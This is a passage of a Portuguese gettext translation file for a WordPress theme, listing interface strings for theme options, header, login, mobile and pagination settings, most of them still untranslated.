Image" msgstr "" #: backend/configs.php:842 msgid "Leaderboard (728x90)" msgstr "" #: includes/actions.php:55 templates/single/review-comment.php:97 #: templates/single/templates.php:906 msgid "Leave a comment" msgstr "Deixe um comentário" #: templates/single/review-comment.php:50 msgid "Leave a reply" msgstr "" #: templates/single/review-comment.php:49 templates/single/templates.php:883 msgid "Leave a review" msgstr "" #: backend/panels/amp.php:287 msgid "Leave blank AMP auto ads if you would like to use the ad units." msgstr "" #: backend/panels/footer.php:115 backend/panels/footer.php:215 msgid "" "Leave blank if you use the \"Archive & Menu Widgets\" font size setting." msgstr "" #: backend/panels/blog-pages.php:694 msgid "" "Leave this option blank if you want to use standard blog layout settings." msgstr "" #: backend/panels/block-classic.php:92 backend/panels/block-grid.php:92 #: backend/panels/block-grid.php:257 backend/panels/block-grid.php:422 #: backend/panels/block-grid.php:595 backend/panels/block-grid.php:782 #: backend/panels/block-list.php:100 backend/panels/block-list.php:273 #: backend/panels/block-list.php:454 backend/panels/block-list.php:649 #: backend/panels/blog-pages.php:437 backend/panels/blog-pages.php:924 #: backend/panels/blog-pages.php:1338 backend/panels/blog-pages.php:1746 #: backend/panels/blog-pages.php:2238 backend/panels/bookmark.php:336 #: backend/panels/bookmark.php:784 msgid "Leave this option blank or set 0 to disable." msgstr "" #: backend/panels/login.php:59 msgid "Leave this option blank to redirect to the homepage." msgstr "" #: backend/panels/login.php:105 backend/panels/login.php:113 msgid "Leave this option blank to set the default value." msgstr "" #: backend/panels/ads.php:53 msgid "Leave this option blank to use unit ads code." msgstr "" #: backend/configs.php:175 backend/configs.php:544 backend/configs.php:823 msgid "Left" msgstr "" #: backend/configs.php:336 msgid "Left Dot" msgstr "" #: backend/panels/footer.php:46 msgid "Left Dotted Style" msgstr "" #: backend/panels/header.php:343 msgid "Left Logo" msgstr "" #: backend/panels/header.php:345 msgid "Left Logo 2" msgstr "" #: backend/mega-menu.php:156 backend/panels/footer.php:66 #: backend/panels/header-style.php:92 backend/panels/header-style.php:380 #: backend/panels/header-style.php:647 backend/panels/header.php:289 msgid "Light Text" msgstr "" #: backend/panels/design.php:574 msgid "Link Hover Effect" msgstr "" #: backend/panels/single-post.php:759 backend/panels/single-post.php:898 #: backend/panels/single-post.php:1036 backend/panels/single-post.php:1665 #: templates/parts.php:606 msgid "LinkedIn" msgstr "" #: backend/panels/socials.php:62 msgid "LinkedIn URL" msgstr "" #: backend/panels/block-list.php:27 backend/panels/block-list.php:200 msgid "list" msgstr "" #: backend/category-settings.php:249 msgid "List 1" msgstr "" #: backend/configs.php:471 backend/panels/block-list.php:17 msgid "List 1 (Standard)" msgstr "" #: backend/category-settings.php:250 backend/configs.php:475 #: backend/panels/block-list.php:190 msgid "List 2" msgstr "" #: templates/single/templates.php:1341 msgid "List of Images" msgstr "" #: backend/panels/header.php:215 msgid "Live Search Result" msgstr "" #: backend/panels/design.php:711 msgid "Load Font Awesome" msgstr "" #: backend/panels/design.php:712 msgid "" "Load font Awesome icons library to your website. This will help you can " "embed this font icons to your widgets and content." msgstr "" #: backend/panels/design.php:706 msgid "" "Load font Awesome icons library. Enabling this option may affect to the site " "performance." msgstr "" #: backend/configs.php:562 backend/panels/bookmark.php:574 msgid "Load More (Ajax)" msgstr "" #: backend/panels/optimized.php:202 msgid "Locality Address" msgstr "" #: backend/panels/login.php:36 msgid "Login Form Position" msgstr "" #: backend/panels/login.php:51 msgid "Login Logo" msgstr "" #: backend/panels/bookmark.php:63 backend/panels/header.php:588 #: backend/panels/login.php:103 msgid "Login Redirect URL" msgstr "" #: backend/panels/login.php:12 msgid "Login Screen" msgstr "" #: backend/panels/login.php:66 msgid "Login Screen Background" msgstr "" #: backend/panels/login.php:79 msgid "Login Screen Color" msgstr "" #: backend/panels/logo.php:16 msgid "Logo" msgstr "" #: backend/panels/login.php:57 msgid "Logo - Destination URL" msgstr "" #: backend/panels/amp.php:97 backend/panels/footer.php:158 msgid "Logo Height" msgstr "" #: backend/panels/header-style.php:368 backend/panels/header-style.php:635 msgid "Logo Max Height" msgstr "" #: backend/panels/header.php:618 backend/panels/login.php:111 msgid "Logout Redirect URL" msgstr "" #: templates/popup.php:208 msgid "Lost your password?" msgstr "Esqueceu sua senha?" #: backend/panels/reaction.php:42 msgid "Love" msgstr "" #: includes/fallbacks.php:165 msgid "M" msgstr "" #: backend/panels/logo.php:46 msgid "Main Logo" msgstr "" #: backend/panels/typography.php:902 functions.php:56 #: templates/header/templates.php:241 msgid "Main Menu" msgstr "" #: templates/header/templates.php:248 msgid "main menu" msgstr "" #: backend/panels/sidebar.php:48 msgid "Making sidebars permanently visible when scrolling up and down." msgstr "" #: backend/category-settings.php:312 msgid "Making this sidebar permanently visible when scrolling up and down." msgstr "" #: backend/mega-menu.php:288 includes/fallbacks.php:274 msgid "Manage Locations" msgstr "" #: backend/panels/page.php:42 backend/panels/single-post.php:182 #: backend/single-metaboxes.php:69 msgid "Max Width Content without Sidebar" msgstr "" #: backend/panels/design.php:68 msgid "Maximum Entry Categories" msgstr "" #: backend/configs.php:852 msgid "Medium Rectangle (300x250)" msgstr "" #: backend/mega-menu.php:124 backend/mega-menu.php:165 msgid "Mega Menu" msgstr "" #: backend/panels/header-style.php:88 backend/panels/header-style.php:376 #: backend/panels/header-style.php:643 msgid "Mega Menu - Text Color Scheme" msgstr "" #: backend/panels/typography.php:908 msgid "Menu Font" msgstr "" #: backend/panels/design.php:592 msgid "Menu Hover Effect" msgstr "" #: backend/mega-menu.php:234 msgid "Menu Icon" msgstr "" #: backend/single-metaboxes.php:540 msgid "Meta Description" msgstr "" #: backend/panels/design.php:244 msgid "Meta Icon ClassName" msgstr "" #: backend/panels/design.php:237 msgid "Meta Label" msgstr "" #: backend/panels/design.php:254 msgid "Meta Label Position" msgstr "" #: backend/panels/logo.php:167 msgid "Metro UI Bookmarklet Icon" msgstr "" #: backend/panels/header.php:729 msgid "Mini Cart" msgstr "" #: backend/class-tgm-plugin-activation.php:2592 msgid "Minimum required version:" msgstr "" #: backend/panels/color.php:118 msgid "Miscellaneous" msgstr "" #: backend/category-settings.php:487 backend/panels/block-classic.php:147 #: backend/panels/block-grid.php:147 backend/panels/block-grid.php:312 #: backend/panels/block-grid.php:477 backend/panels/block-grid.php:650 #: backend/panels/block-grid.php:837 backend/panels/block-list.php:155 #: backend/panels/block-list.php:328 backend/panels/block-list.php:509 #: backend/panels/block-list.php:704 backend/panels/blog-pages.php:512 #: backend/panels/blog-pages.php:999 backend/panels/blog-pages.php:1413 #: backend/panels/blog-pages.php:1821 backend/panels/blog-pages.php:2313 #: backend/panels/bookmark.php:859 backend/panels/single-post.php:608 #: backend/panels/single-post.php:617 msgid "Mobile - Hide Entry Meta" msgstr "" #: backend/category-settings.php:457 backend/panels/blog-pages.php:482 #: backend/panels/blog-pages.php:969 backend/panels/blog-pages.php:1383 #: backend/panels/blog-pages.php:1791 backend/panels/blog-pages.php:2283 #: backend/panels/bookmark.php:381 backend/panels/bookmark.php:829 msgid "Mobile - Title Font Size" msgstr "" #: backend/configs.php:859 msgid "Mobile Banner (320x100)" msgstr "" #: backend/configs.php:856 msgid "Mobile Banner (320x50)" msgstr "" #: backend/panels/typography.php:52 backend/panels/typography.php:98 #: backend/panels/typography.php:147 backend/panels/typography.php:196 #: backend/panels/typography.php:245 backend/panels/typography.php:294 #: backend/panels/typography.php:343 backend/panels/typography.php:392 #: backend/panels/typography.php:441 backend/panels/typography.php:507 #: backend/panels/typography.php:555 backend/panels/typography.php:610 #: backend/panels/typography.php:653 backend/panels/typography.php:729 #: backend/panels/typography.php:786 backend/panels/typography.php:870 #: backend/panels/typography.php:1056 backend/panels/typography.php:1128 msgid "Mobile Font Size" msgstr "" #: backend/configs.php:860 msgid "Mobile Friendly (300x100)" msgstr "" #: backend/panels/header.php:306 msgid "Mobile Header" msgstr "" #: backend/panels/header.php:746 msgid "Mobile Header - Mini Cart" msgstr "" #: backend/panels/header.php:237 msgid "Mobile Header - Search Icon" msgstr "" #: backend/panels/header.php:540 msgid "Mobile Header - Sign In" msgstr "" #: backend/panels/header.php:402 msgid "Mobile Header Colors" msgstr "" #: backend/panels/header.php:340 msgid "Mobile Header Layout" msgstr "" #: backend/panels/header.php:333 msgid "Mobile Header Style" msgstr "" #: backend/panels/logo.php:95 msgid "Mobile Logo" msgstr "" #: backend/panels/logo.php:85 msgid "Mobile Logos" msgstr "" #: backend/panels/typography.php:947 functions.php:57 #: templates/header/templates.php:609 msgid "Mobile Menu" msgstr "" #: backend/panels/typography.php:953 msgid "Mobile Menu Font" msgstr "" #: backend/panels/header.php:353 msgid "Mobile Navigation Height" msgstr "" #: backend/panels/typography.php:992 functions.php:58 msgid "Mobile Quick Access" msgstr "" #: backend/panels/typography.php:998 msgid "Mobile Quick Access Menu Font" msgstr "" #: backend/panels/color.php:102 msgid "Mode Switcher - Dark Icon Background" msgstr "" #: backend/panels/color.php:94 msgid "Mode Switcher - Light Icon Color" msgstr "" #: templates/header/templates.php:421 msgid "More" msgstr "" #: backend/panels/header.php:222 msgid "More Menu - Search Form" msgstr "" #: backend/panels/header-style.php:29 backend/panels/header-style.php:323 #: backend/panels/header-style.php:574 msgid "More Menu Button" msgstr "" #: backend/panels/header.php:112 msgid "More Menu Item" msgstr "" #: includes/sidebars.php:86 msgid "More Menu Section" msgstr "" #: backend/panels/header.php:208 msgid "More Menu Triggered" msgstr "" #: templates/ajax.php:186 msgid "More Results" msgstr "Mais resultados" #: templates/parts.php:621 msgid "Myspace" msgstr "" #: backend/panels/socials.php:92 msgid "Myspace URL" msgstr "" #: backend/panels/login.php:96 msgid "Navigate to \"Header > Popup Sign In\" to set for the popup login form." msgstr "" #: backend/panels/blog-pages.php:229 msgid "" "Navigate to \"Heading Design\" panel to edit font size for table and mobile " "device." msgstr "" #: backend/panels/heading.php:42 msgid "" "Navigate to \"Typography Settings > Block Heading\" to set the font values." msgstr "" #: backend/panels/footer.php:201 msgid "" "Navigate to Typography > Archive & Menu Widgets > Footer Menus to set the " "font values." msgstr "" #: backend/panels/header-style.php:112 backend/panels/header-style.php:400 #: backend/panels/header-style.php:480 backend/panels/header-style.php:667 #: backend/panels/header-style.php:746 msgid "Navigation Background" msgstr "" #: backend/panels/blog-pages.php:45 backend/panels/blog-pages.php:611 #: backend/panels/blog-pages.php:1929 backend/panels/header-style.php:68 #: backend/panels/header-style.php:345 backend/panels/header-style.php:613 #: backend/single-metaboxes.php:129 backend/single-metaboxes.php:906 msgid "Navigation Bar Style" msgstr "" #: backend/panels/header-style.php:51 backend/panels/header-style.php:596 msgid "Navigation Bar Style & Layout" msgstr "" #: backend/panels/header-style.php:106 backend/panels/header-style.php:394 #: backend/panels/header-style.php:661 msgid "Navigation Colors" msgstr "" #: backend/panels/header-style.php:361 backend/panels/header-style.php:628 msgid "Navigation Height" msgstr "" #: backend/mega-menu.php:210 msgid "Navigation Sub Label" msgstr "" #: templates/parts.php:395 msgid "Newer Articles" msgstr "" #: comments.php:26 msgid "Newer Comments →" msgstr "" #: templates/single/review-comment.php:37 msgid "Newer Reviews" msgstr "" #: backend/panels/single-post.php:348 msgid "Newsletter Description" msgstr "" #: templates/blocks/newsletter.php:42 templates/blocks/newsletter.php:44 #: templates/blocks/newsletter.php:47 templates/blocks/newsletter.php:106 #: templates/blocks/newsletter.php:108 templates/blocks/newsletter.php:111 msgid "newsletter featured" msgstr "" #: backend/panels/single-post.php:341 msgid "Newsletter Heading" msgstr "" #: backend/panels/newsletter.php:48 backend/panels/single-post.php:355 msgid "Newsletter Shortcode" msgstr "" #: templates/parts.php:349 msgid "Next" msgstr "" #: templates/single/templates.php:1029 msgid "Next Article" msgstr "" #: templates/single/templates.php:580 msgid "Next Page" msgstr "" #: backend/panels/single-post.php:1372 msgid "Next Prev" msgstr "" #: backend/panels/single-post.php:401 msgid "Next/Prev - Mobile Hide" msgstr "" #: backend/panels/amp.php:204 msgid "Next/Prev Articles" msgstr "" #: backend/panels/single-post.php:392 msgid "Next/Prev Post Pagination" msgstr "" #: backend/class-tgm-plugin-activation.php:402 #, php-format msgid "No action taken. Plugin %1$s was already active." msgstr "" #: backend/panels/design.php:677 msgid "No Border" msgstr "" #: backend/configs.php:670 msgid "No Featured" msgstr "" #: templates/parts.php:114 msgid "" "No found posts, Please add a new post for this query or change the block " "settings: " msgstr "" #: backend/configs.php:525 msgid "No Gap" msgstr "" #: backend/panels/page.php:35 backend/single-metaboxes.php:63 msgid "No Header" msgstr "" #: backend/class-tgm-plugin-activation.php:3028 msgid "No plugins are available to be activated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2894 msgid "No plugins are available to be installed at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2896 msgid "No plugins are available to be updated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2627 msgid "No plugins to install, update or activate." msgstr "" #: backend/class-tgm-plugin-activation.php:3002 msgid "No plugins were selected to be activated. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2851 msgid "No plugins were selected to be installed. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2853 msgid "No plugins were selected to be updated. No action taken." msgstr "" #: backend/configs.php:168 backend/configs.php:543 msgid "No Sidebar" msgstr "" #: backend/panels/ads.php:242 msgid "No spacing" msgstr "" #: backend/panels/blog-pages.php:53 backend/panels/blog-pages.php:619 #: backend/panels/blog-pages.php:1937 backend/panels/design.php:276 #: backend/panels/header-style.php:74 backend/panels/header-style.php:622 #: backend/single-metaboxes.php:136 backend/single-metaboxes.php:913 msgid "None" msgstr "" #: backend/panels/single-post.php:212 msgid "Normal" msgstr "" #: backend/panels/single-post.php:211 msgid "Normal Italic" msgstr "" #: backend/panels/ads.php:536 msgid "Not Activate - Button Background" msgstr "" #: backend/panels/ads.php:528 msgid "Not Activate - Button Text Color" msgstr "" #: backend/class-tgm-plugin-activation.php:2409 msgid "Not Installed" msgstr "" #: templates/single/review-comment.php:93 msgid "Not that Bad" msgstr "" #: templates/blog.php:13 msgid "Nothing Found" msgstr "" #: backend/panels/header.php:261 templates/header/templates.php:694 #: templates/header/templates.php:699 msgid "Notification" msgstr "" #: backend/panels/header.php:269 msgid "Notification Section" msgstr "" #: templates/blocks/playlist.php:52 msgid "Now Playing" msgstr "" #: backend/panels/single-post.php:1361 msgid "Number of Posts" msgstr "" #: backend/configs.php:560 backend/panels/blog-pages.php:1452 #: backend/panels/blog-pages.php:1860 msgid "Numeric" msgstr "" #: backend/single-metaboxes.php:586 msgid "Offer Destination URL" msgstr "" #: backend/single-metaboxes.php:580 msgid "Offer Label" msgstr "" #: templates/popup.php:242 msgid "Okay, I'll Whitelist" msgstr "" #: templates/parts.php:398 msgid "Older Articles" msgstr "" #: templates/single/review-comment.php:36 msgid "Older Reviews" msgstr "" #: backend/category-settings.php:470 backend/category-settings.php:500 #: backend/configs.php:254 backend/panels/blog-pages.php:494 #: backend/panels/blog-pages.php:524 backend/panels/blog-pages.php:981 #: backend/panels/blog-pages.php:1011 backend/panels/blog-pages.php:1395 #: backend/panels/blog-pages.php:1425 backend/panels/blog-pages.php:1803 #: backend/panels/blog-pages.php:1833 backend/panels/blog-pages.php:2295 #: backend/panels/blog-pages.php:2325 backend/panels/bookmark.php:393 #: backend/panels/bookmark.php:841 msgid "On Mobile" msgstr "" #: backend/category-settings.php:471 backend/category-settings.php:501 #: backend/configs.php:255 backend/panels/blog-pages.php:495 #: backend/panels/blog-pages.php:525 backend/panels/blog-pages.php:982 #: backend/panels/blog-pages.php:1012 backend/panels/blog-pages.php:1396 #: backend/panels/blog-pages.php:1426 backend/panels/blog-pages.php:1804 #: backend/panels/blog-pages.php:1834 backend/panels/blog-pages.php:2296 #: backend/panels/blog-pages.php:2326 backend/panels/bookmark.php:394 #: backend/panels/bookmark.php:842 msgid "On Tablet" msgstr "" #: backend/category-settings.php:472 backend/category-settings.php:502 #: backend/configs.php:256 backend/panels/blog-pages.php:496 #: backend/panels/blog-pages.php:526 backend/panels/blog-pages.php:983 #: backend/panels/blog-pages.php:1013 backend/panels/blog-pages.php:1397 #: backend/panels/blog-pages.php:1427 backend/panels/blog-pages.php:1805 #: backend/panels/blog-pages.php:1835 backend/panels/blog-pages.php:2297 #: backend/panels/blog-pages.php:2327 backend/panels/bookmark.php:395 #: backend/panels/bookmark.php:843 msgid "On Tablet & Mobile" msgstr "" #: includes/sidebars.php:106 includes/sidebars.php:115 #: includes/sidebars.php:124 includes/sidebars.php:134 #: includes/sidebars.php:145 msgid "one of the columns of the footer area." msgstr "" #: backend/theme-options.php:224 msgid "Online Documentation" msgstr "" #: backend/panels/blog-pages.php:1901 msgid "Only display posts in the search results." msgstr "" #: backend/panels/header.php:658 msgid "Only Homepage" msgstr "" #: backend/panels/single-post.php:1450 msgid "Only load posts which has same categories with the current post." msgstr "" #: backend/panels/bookmark.php:55 msgid "Only Logged Users" msgstr "" #: backend/panels/blog-pages.php:1900 msgid "Only Search Posts" msgstr "" #: backend/panels/header.php:659 msgid "Only show the bar in the homepage." msgstr "" #: backend/panels/header.php:90 msgid "Only stick the main menu when scrolling up." msgstr "" #: backend/configs.php:328 msgid "Only Text" msgstr "" #: backend/configs.php:329 msgid "Only Text (Big)" msgstr "" #: templates/blog.php:494 msgid "Oops! Nothing here" msgstr "Ops! Nada aqui" #: backend/panels/optimized.php:230 backend/panels/optimized.php:236 msgid "Open Graph" msgstr "" #: backend/panels/single-post.php:175 msgid "Optimal Line Length" msgstr "" #: backend/panels/single-post.php:172 msgid "" "Optimized the line length of the post content for reading (max width: 730px)." msgstr "" #: backend/single-metaboxes.php:45 msgid "" "Options below will apply to the single page and Elementor page. To config " "for the blog page, navigate to Theme Options > Blog & Achives." msgstr "" #: backend/mega-menu.php:242 msgid "or Attachment/SVG Icon" msgstr "" #: backend/mega-menu.php:197 msgid "or Ruby Templates Shortcode" msgstr "" #: backend/panels/optimized.php:175 msgid "Organization Info" msgstr "" #: backend/panels/optimized.php:121 msgid "Organization Schema Markup" msgstr "" #: backend/panels/single-post.php:586 msgid "" "Organize how you want the entry meta info to appear in the single post pages." msgstr "" #: backend/panels/block-classic.php:51 backend/panels/block-grid.php:51 #: backend/panels/block-grid.php:216 backend/panels/block-grid.php:381 #: backend/panels/block-grid.php:554 backend/panels/block-grid.php:741 #: backend/panels/block-list.php:59 backend/panels/block-list.php:232 #: backend/panels/block-list.php:413 backend/panels/block-list.php:608 #: backend/panels/blog-pages.php:385 backend/panels/blog-pages.php:872 #: backend/panels/blog-pages.php:1286 backend/panels/blog-pages.php:1694 #: backend/panels/blog-pages.php:2186 backend/panels/bookmark.php:284 #: backend/panels/bookmark.php:732 msgid "" "Organize how you want the entry meta to appear. Leave blank to set it as the " "default." msgstr "" #: backend/panels/design.php:394 msgid "Original Ratio - 1536x0" msgstr "" #: backend/panels/design.php:386 msgid "Original Ratio - 860x0" msgstr "" #: backend/panels/adblock.php:35 msgid "" "Our site is an advertising supported site. Please whitelist to support our " "site." msgstr "" #: templates/entry.php:1087 msgid "out of 10" msgstr "" #: templates/entry.php:1090 msgid "out of 5" msgstr "" #: backend/panels/header.php:232 msgid "Override default search icon with a SVG icon." msgstr "" #: backend/single-metaboxes.php:229 msgid "p" msgstr "" #: backend/configs.php:243 msgid "p tag" msgstr "" #: backend/panels/breadcrumb.php:45 msgid "Page Breadcrumbs" msgstr "" #: backend/single-metaboxes.php:56 msgid "Page Header Style" msgstr "" #: backend/panels/blog-pages.php:1029 msgid "Pagination" msgstr "" #: backend/panels/single-post.php:1367 msgid "Pagination Style" msgstr "" #: backend/category-settings.php:225 backend/panels/blog-pages.php:547 #: backend/panels/blog-pages.php:1035 backend/panels/blog-pages.php:1448 #: backend/panels/blog-pages.php:1856 backend/panels/blog-pages.php:2348 #: backend/panels/bookmark.php:569 msgid "Pagination Type" msgstr "" #: backend/panels/single-post.php:171 msgid "Paragraph Line Length" msgstr "" #: backend/configs.php:610 msgid "Pattern Diagonal" msgstr "" #: backend/configs.php:611 msgid "Pattern Diagonal 2" msgstr "" #: backend/configs.php:608 msgid "Pattern Dotted" msgstr "" #: backend/configs.php:609 msgid "Pattern Dotted 2" msgstr "" #: templates/single/review-comment.php:90 msgid "Perfect" msgstr "" #: backend/panels/optimized.php:14 msgid "Performance" msgstr "" #: backend/panels/optimized.php:188 msgid "Phone Number" msgstr "" #: backend/panels/single-post.php:741 backend/panels/single-post.php:880 #: backend/panels/single-post.php:1018 backend/panels/single-post.php:1649 #: templates/parts.php:600 msgid "Pinterest" msgstr "" #: backend/panels/socials.php:55 msgid "Pinterest URL" msgstr "" #: includes/fallbacks.php:273 #, php-format msgid "Please assign a menu to the \"%s\" location under " msgstr "" #: backend/panels/design.php:70 msgid "Please blank to display all categories" msgstr "" #: backend/class-tgm-plugin-activation.php:409 msgid "Please contact the administrator of this site for help." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 #: backend/class-tgm-plugin-activation.php:1030 msgid "" "Please contact the plugin provider and ask them to package their plugin " "according to the WordPress guidelines." msgstr "" #: backend/mega-menu.php:240 backend/panels/socials.php:171 msgid "" "Please ensure that Font Awesome is enabled in \"Theme Options > Theme Design " "> Font Awesome\" if you use this font icon classname." msgstr "" #: backend/single-metaboxes.php:373 msgid "" "Please ensure that the \"Audio\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:420 msgid "" "Please ensure that the \"Gallery\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:318 msgid "" "Please ensure that the \"Video\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/panels/design.php:616 msgid "" "Please ensure that you are using trusted svg sources to avoid XML " "vulnerabilities." msgstr "" #: templates/single/review-comment.php:86 msgid "Please select a rating!" msgstr "" #: backend/panels/header.php:53 msgid "" "Please select setting panel corresponding to the layout you choose for " "setting up background, color and other settings." msgstr "" #: backend/panels/newsletter.php:21 msgid "" "Please update cover images to your own images after importing the theme demo." msgstr "" #: templates/entry.php:1345 msgid "Please update WordPress to the latest version to display this audio." msgstr "" #: templates/entry.php:1292 msgid "Please update WordPress to the latest version to display this video." msgstr "" #: backend/class-tgm-plugin-activation.php:2641 msgid "Plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:399 #: backend/class-tgm-plugin-activation.php:3253 backend/install-plugins.php:81 msgid "Plugin activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3252 msgid "Plugin activation failed." msgstr "" #: backend/class-tgm-plugin-activation.php:404 #, php-format msgid "" "Plugin not activated. A higher version of %s is needed for this theme. " "Please update the plugin." msgstr "" #: backend/panels/single-post.php:362 msgid "Policy Text" msgstr "" #: backend/panels/single-post.php:1388 backend/panels/single-post.php:1394 msgid "Popular Section" msgstr "" #: backend/panels/newsletter.php:77 msgid "Popup Expired" msgstr "" #: backend/panels/newsletter.php:14 backend/panels/newsletter.php:27 msgid "Popup Newsletter" msgstr "" #: backend/panels/bookmark.php:44 msgid "Popup Notification" msgstr "" #: backend/panels/header.php:518 msgid "Popup Sign In" msgstr "" #: backend/configs.php:855 msgid "Portrait (300x1050)" msgstr "" #: templates/single/review-comment.php:51 msgid "Post a Review" msgstr "" #: backend/category-settings.php:365 backend/category-settings.php:381 #: backend/panels/block-classic.php:73 backend/panels/block-grid.php:73 #: backend/panels/block-grid.php:238 backend/panels/block-grid.php:403 #: backend/panels/block-grid.php:576 backend/panels/block-grid.php:763 #: backend/panels/block-list.php:81 backend/panels/block-list.php:254 #: backend/panels/block-list.php:435 backend/panels/block-list.php:630 #: backend/panels/blog-pages.php:408 backend/panels/blog-pages.php:895 #: backend/panels/blog-pages.php:1309 backend/panels/blog-pages.php:1717 #: backend/panels/blog-pages.php:2209 backend/panels/bookmark.php:307 #: backend/panels/bookmark.php:755 msgid "Post Format Icon" msgstr "" #: backend/panels/design.php:470 msgid "Post Format Icons" msgstr "" #: backend/single-metaboxes.php:205 msgid "Post highlights" msgstr "" #: backend/single-metaboxes.php:187 msgid "Post Options" msgstr "" #: backend/single-metaboxes.php:471 msgid "Post Review" msgstr "" #: backend/panels/optimized.php:160 msgid "Post Review Markup" msgstr "" #: backend/single-metaboxes.php:771 msgid "Post Sources" msgstr "" #: backend/panels/single-post.php:296 msgid "Post Tags Bar" msgstr "" #: backend/panels/table-contents.php:23 msgid "Post Type Supported" msgstr "" #: backend/single-metaboxes.php:792 msgid "Post Via" msgstr "" #: backend/panels/design.php:131 msgid "Post View Meta Icon" msgstr "" #: backend/install-plugins.php:48 msgid "Post Views Counter" msgstr "" #: backend/panels/optimized.php:216 msgid "Postal Code" msgstr "" #: templates/entry.php:367 templates/entry.php:401 msgid "Posted" msgstr "" #: templates/entry.php:1159 msgid "Posted by" msgstr "" #: backend/panels/single-post.php:1347 msgid "Posts from Where" msgstr "" #: backend/category-settings.php:164 backend/panels/blog-pages.php:708 msgid "Posts Per Page" msgstr "" #: backend/category-settings.php:169 backend/panels/blog-pages.php:172 #: backend/panels/blog-pages.php:177 backend/panels/blog-pages.php:713 #: backend/panels/blog-pages.php:1123 backend/panels/blog-pages.php:1128 #: backend/panels/blog-pages.php:1532 backend/panels/blog-pages.php:1537 #: backend/panels/blog-pages.php:2024 backend/panels/blog-pages.php:2029 #: backend/panels/bookmark.php:561 msgid "Posts per Page" msgstr "" #: backend/class-tgm-plugin-activation.php:2392 msgid "Pre-Packaged" msgstr "" #: backend/panels/design.php:257 msgid "Prefix" msgstr "" #: backend/panels/optimized.php:74 msgid "Preload Font Icon" msgstr "" #: backend/panels/optimized.php:67 msgid "Preload Google Fonts" msgstr "" #: backend/panels/design.php:641 msgid "Prevent WordPress convert gif to a static image when uploading." msgstr "" #: backend/single-metaboxes.php:338 msgid "Preview Video" msgstr "" #: templates/parts.php:348 msgid "Previous" msgstr "" #: templates/single/templates.php:1016 msgid "Previous Article" msgstr "" #: templates/single/templates.php:564 msgid "Previous Page" msgstr "" #: backend/panels/woocommerce.php:188 msgid "Price Color" msgstr "" #: backend/panels/woocommerce.php:253 msgid "Price Font" msgstr "" #: backend/single-metaboxes.php:592 msgid "Price Offer" msgstr "" #: backend/panels/single-post.php:487 backend/single-metaboxes.php:267 msgid "Primary Category" msgstr "" #: backend/panels/heading.php:49 backend/panels/heading.php:134 msgid "Primary Heading Color" msgstr "" #: backend/panels/single-post.php:822 backend/panels/single-post.php:961 #: backend/panels/single-post.php:1099 backend/panels/single-post.php:1713 msgid "Print" msgstr "" #: backend/panels/privacy.php:14 msgid "Privacy Bar" msgstr "" #: backend/panels/privacy.php:7 msgid "Privacy Notice" msgstr "" #: backend/panels/woocommerce.php:237 msgid "Product Title Font" msgstr "" #: backend/panels/woocommerce.php:71 msgid "Products per Page" msgstr "" #: backend/panels/design.php:110 msgid "Published Date Icon" msgstr "" #: backend/panels/single-post.php:269 backend/panels/single-post.php:275 msgid "Quick View Info" msgstr "" #: templates/single/review-comment.php:89 msgid "Rate…" msgstr "" #: backend/panels/reaction.php:31 msgid "Reaction Heading" msgstr "" #: backend/panels/reaction.php:37 msgid "Reaction Items" msgstr "" #: backend/panels/reaction.php:23 msgid "Reaction Section" msgstr "" #: backend/configs.php:409 backend/panels/design.php:275 msgid "read (Reading Time)" msgstr "" #: templates/template-helpers.php:238 templates/template-helpers.php:382 msgid "Read More" msgstr "Leia mais" #: backend/category-settings.php:425 backend/panels/block-classic.php:106 #: backend/panels/block-grid.php:106 backend/panels/block-grid.php:271 #: backend/panels/block-grid.php:436 backend/panels/block-grid.php:609 #: backend/panels/block-grid.php:796 backend/panels/block-list.php:114 #: backend/panels/block-list.php:287 backend/panels/block-list.php:468 #: backend/panels/block-list.php:663 backend/panels/blog-pages.php:453 #: backend/panels/blog-pages.php:940 backend/panels/blog-pages.php:1354 #: backend/panels/blog-pages.php:1762 backend/panels/blog-pages.php:2254 #: backend/panels/bookmark.php:352 backend/panels/bookmark.php:800 #: backend/panels/design.php:535 backend/panels/typography.php:530 msgid "Read More Button" msgstr "" #: backend/panels/typography.php:538 msgid "Read More Font" msgstr "" #: backend/panels/design.php:549 msgid "Read More Icon" msgstr "" #: backend/panels/design.php:543 msgid "Read More Label" msgstr "" #: backend/panels/single-post.php:1564 msgid "Reading Font Resizer" msgstr "" #: backend/panels/single-post.php:1736 backend/panels/single-post.php:1745 msgid "Reading Indicator" msgstr "" #: backend/panels/bookmark.php:88 backend/panels/bookmark.php:106 #: templates/header/templates.php:710 msgid "Reading List" msgstr "" #: backend/panels/bookmark.php:98 msgid "Reading List Header" msgstr "" #: backend/panels/design.php:160 msgid "Reading Speed" msgstr "" #: backend/panels/single-post.php:661 backend/panels/single-post.php:667 msgid "Reading Time" msgstr "" #: backend/panels/design.php:138 msgid "Reading Time Meta Icon" msgstr "" #: templates/single/templates.php:1485 msgid "Reading:" msgstr "Leitura:" #: templates/blog.php:497 msgid "Ready to publish your first post?" msgstr "" #: templates/blog.php:17 #, php-format msgid "" "Ready to publish your first post? Get started here." msgstr "" #: backend/class-tgm-plugin-activation.php:2370 backend/panels/bookmark.php:502 msgid "Recommended" msgstr "" #: backend/panels/bookmark.php:520 msgid "Recommended for You" msgstr "" #: backend/panels/bookmark.php:512 msgid "Recommended Heading" msgstr "" #: backend/panels/design.php:315 msgid "Recommended select the top position if you have people images." msgstr "" #: backend/panels/single-post.php:777 backend/panels/single-post.php:916 #: backend/panels/single-post.php:1054 backend/panels/single-post.php:1681 #: templates/parts.php:639 msgid "Reddit" msgstr "" #: backend/panels/socials.php:128 msgid "Reddit URL " msgstr "" #: backend/panels/header.php:527 backend/panels/login.php:95 msgid "Redirect links should be inner links." msgstr "" #: backend/panels/login.php:93 msgid "Redirect Settings" msgstr "" #: backend/panels/bookmark.php:56 msgid "Redirect to 